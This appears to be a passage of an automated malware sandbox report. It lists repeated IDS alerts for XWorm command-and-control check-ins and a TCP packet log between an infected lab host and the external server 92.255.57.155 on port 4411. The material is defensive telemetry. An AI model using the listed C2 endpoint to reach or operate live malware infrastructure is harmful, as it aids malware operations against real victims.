                                2024-12-18T08:17:34.610002+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:34.661087+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:34.772953+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:34.782107+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:34.971946+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:34.973565+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:35.814048+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:35.814970+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:36.004018+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:36.298214+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:36.393762+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:36.489312+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:36.516082+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:36.584703+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:36.635730+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:39.420306+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:39.421289+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:39.613976+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:39.701496+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:40.022119+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:40.022972+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:40.319555+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:40.327332+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:40.627225+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:40.671100+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:41.780411+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:41.781321+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:42.030027+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:42.030867+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:42.654781+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:42.655669+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:43.259093+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:43.260221+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:45.764249+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:45.923231+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:46.116234+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:46.138020+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:46.207798+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:46.235976+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:46.427165+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:46.430778+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:46.660408+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:46.709757+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:46.862470+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:46.891939+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:47.083075+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:47.102141+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:47.905593+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:47.906861+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:48.140267+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:48.231733+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:48.545135+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:48.546132+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:48.833927+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:48.837987+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:49.024484+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:49.028773+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:49.148943+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:49.149989+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:49.842292+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:49.889402+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:50.033438+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:50.153355+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:50.153495+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:50.319790+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:50.436716+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:50.464309+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:50.511018+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:50.511138+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:50.596929+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:50.849597+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:50.853991+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:52.014208+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:52.015176+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:52.141800+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:52.325980+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:52.420644+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:52.624952+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:52.660907+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:52.971915+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:53.042473+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:53.046102+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:53.133993+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:53.277222+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:53.279175+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:53.444801+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:53.445717+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:54.639300+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:54.641289+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:55.248426+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:55.311781+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:55.625013+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:55.684996+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:55.913635+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:55.924147+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:56.104662+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:56.234945+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:56.283098+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:56.335800+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:56.404695+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:56.570069+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:56.604705+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:56.717128+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:56.950326+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:57.998586+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:57.999588+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:58.237203+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:58.239592+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:58.429825+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:58.663864+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:58.664836+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:59.260084+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:59.262856+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:59.549193+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:59.967979+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:18:00.013906+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:18:00.158963+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:18:00.324751+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:18:00.350050+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:18:05.990968+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Dec 18, 2024 08:15:28.613266945 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:15:28.732817888 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:15:28.732911110 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:15:28.868993998 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:15:28.988531113 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:15:42.786506891 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:15:42.905996084 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:15:43.333388090 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:15:43.377144098 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:15:43.392539978 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:15:43.512253046 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:15:56.726151943 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:15:56.845694065 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:15:57.158905029 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:15:57.163921118 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:15:57.287734985 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:15:58.442835093 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:15:58.486578941 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:10.582201958 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:10.702124119 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:11.015125036 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:11.017028093 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:11.136558056 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:24.440109968 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:24.559638977 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:24.874898911 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:24.877590895 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:24.997315884 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:28.597086906 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:28.643058062 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:29.971666098 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:30.091110945 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:30.404356956 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:30.407636881 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:30.527044058 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:30.611993074 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:30.731575966 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:31.044514894 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:31.046397924 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:31.166193008 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:31.252614975 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:31.372155905 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:31.596435070 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:31.686005116 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:31.715950012 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:31.717077017 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:31.836745977 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:31.862080097 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:31.981614113 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:32.036315918 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:32.038280010 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:32.157780886 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:32.322472095 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:32.324559927 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:32.444396019 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:32.612062931 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:32.731609106 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:33.044857979 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:33.046684980 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:33.166282892 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:33.166340113 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:33.285896063 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:33.285955906 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:33.405553102 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:33.647092104 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:33.649039984 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:33.768639088 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:33.768691063 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:33.838110924 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:33.878757000 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:33.888191938 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:33.888262033 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:33.959872961 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:34.007788897 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:34.007859945 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:34.127446890 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:34.256990910 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:34.258519888 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:34.378185034 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:34.378310919 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:34.448062897 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:34.448152065 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:34.497962952 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:34.498083115 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:34.567820072 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:34.617769957 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:34.865787029 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:34.871488094 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:34.991089106 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:35.056778908 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:35.059297085 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:35.181488991 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:35.205790043 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:35.325376987 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:35.325438976 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:35.444937944 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:35.455991030 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:35.575536013 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:35.575592041 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:35.657782078 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:35.657845974 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:35.695229053 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:35.695370913 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:35.777293921 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:35.814837933 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:35.814896107 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:35.848676920 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:35.920715094 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:35.968422890 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:35.968475103 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:36.081371069 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:36.081444979 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:36.145221949 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:36.145277023 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:36.159528971 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:36.202136993 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:36.204297066 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:36.264780998 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:36.265950918 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:36.271574020 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:36.365291119 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:36.365897894 CET497084411192.168.2.892.255.57.155
